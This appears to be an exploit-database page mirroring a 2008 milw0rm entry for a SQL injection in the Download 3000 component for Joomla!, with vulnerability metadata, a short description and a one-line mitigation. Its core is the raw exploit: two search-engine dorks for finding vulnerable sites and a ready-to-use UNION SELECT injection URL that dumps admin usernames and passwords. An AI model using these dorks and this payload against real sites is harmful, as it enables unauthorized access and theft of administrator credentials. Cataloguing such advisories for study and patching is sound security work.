header-logo
Suggest Exploit
vendor:
D3000
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: D3000
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: NO
Related CWE: N/A
CPE: a:download3000:d3000
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Joomla!
2008

D3000

An attacker can exploit a SQL injection vulnerability in the Download 3000 component for Joomla! to execute arbitrary SQL commands. The vulnerability is due to insufficient sanitization of user-supplied input to the 'id' parameter of the 'index.php' script when 'task' is set to 'showarticles'. An attacker can exploit this vulnerability to execute arbitrary SQL commands in the context of the affected application. This may allow the attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to dynamically construct SQL queries.
Source

Exploit-DB raw data:

##########################################
#
# Powered by Download 3000
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : "Powered by Download 3000"
#
# DORK 2 : allinurl: "com_d3000"
#
###########################################
EXPLOiT :

index.php?option=com_d3000&task=showarticles&id=-99999/**/union/**/select/**/0,username,pass_word/**/from/**/admin/*


###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################

side note:
    <name>D3000</name>
    <author>Csaba Kissi</author>
    <creationDate>April 2006</creationDate>
    <copyright>(C) 2006 Open Source Matters. All rights reserved.</copyright>
    <license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>

    <authorEmail>info@download3000.com</authorEmail>
    <authorUrl>joomla.download3000.com</authorUrl>
    <version>1.0.0</version>
    <description><![CDATA[
     This component integrates the whole www.Download3000.com software archive (more than 12.000 software articles already)<br /> 
     to your Joomla powered site within one minute. The best of all is the fact that you can earn money through the<br /> 
     RegNow affiliate program. The component is optimized for Googlebot and Inktomi slurp so you'll get more visitors from search engines.<br />
     For more information about usage and your affiliate ID activation please read the help file in the package.<br />
     Please send us your suggestions, comments and future requests for the Download3000 component. Thank you in advance.]]> 
    </description>    

# milw0rm.com [2008-03-23]